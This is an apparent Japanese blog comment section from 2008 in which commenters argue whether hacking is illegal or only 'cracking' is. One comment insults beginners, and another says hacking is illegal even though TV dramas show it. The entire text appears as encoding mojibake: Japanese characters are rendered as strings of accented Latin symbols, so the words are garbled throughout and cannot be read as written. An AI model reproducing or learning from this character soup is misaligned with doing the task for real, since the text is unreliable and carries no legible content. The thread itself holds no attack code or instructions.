[C32] ¥Ï¥Ã¥¥ó¥°¤Ï
¥Ï¥Ã¥¥ó¥°¤Ï°ãË¡¤¸¤ã¤Í¡¼¥Ð¡¼¤«
¤½¤ó¤Ê¤³¤È¤âÃΤ餺¤Ë¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤¹¤ó¤¸¤ã¤Í¡¼¤è¡¡Ž¶Ž½Ž¶ŽÞ
¤È¤Ã¤È¤È¥Í¥Ã¥È¤«¤éűÂष¤Ê
°¤¤¤Î¤Ï¥¯¥é¥Ã¥¥ó¥°¤À
°ì½ï¤Ë¤¹¤ó¤Ê¡¡½é¿´¼Ô¤¬
¤½¤ó¤Ê¤³¤È¤âÃΤ餺¤Ë¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤¹¤ó¤¸¤ã¤Í¡¼¤è¡¡Ž¶Ž½Ž¶ŽÞ
¤È¤Ã¤È¤È¥Í¥Ã¥È¤«¤éűÂष¤Ê
°¤¤¤Î¤Ï¥¯¥é¥Ã¥¥ó¥°¤À
°ì½ï¤Ë¤¹¤ó¤Ê¡¡½é¿´¼Ô¤¬
- 2008-10-14
- ÊÔ½¸
[C28]
¥É¥é¥Þ¤Ç¤ä¤Ã¤Æ¤¿¤é¤·¤Æ¤¤¤¤¤Ã¤ÆŽÜ޹¤¸¤ã¤Ê¤¤¤«¤é¤Í¡ª¡ª
¤¤¤¯¤é¤Ê¤ó¤Ç¤â¥Ï¥Ã¥¥ó¥°¤î°ãË¡¤À¤«¤é¡ª¡ª
¤¤¤¯¤é¤Ê¤ó¤Ç¤â¥Ï¥Ã¥¥ó¥°¤î°ãË¡¤À¤«¤é¡ª¡ª
- 2008-10-13
- ÊÔ½¸
¥³¥á¥ó¥È¤ÎÅê¹Æ
0·ï¤Î¥È¥é¥Ã¥¯¥Ð¥Ã¥¯
- ¥È¥é¥Ã¥¯¥Ð¥Ã¥¯URL
- http://edita.blog45.fc2.com/tb.php/100-925fc68d
- ¤³¤Îµ»ö¤ËÂФ·¤Æ¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤òÁ÷¿®¤¹¤ë¡ÊFC2¥Ö¥í¥°¥æ¡¼¥¶¡¼¡Ë



[C35]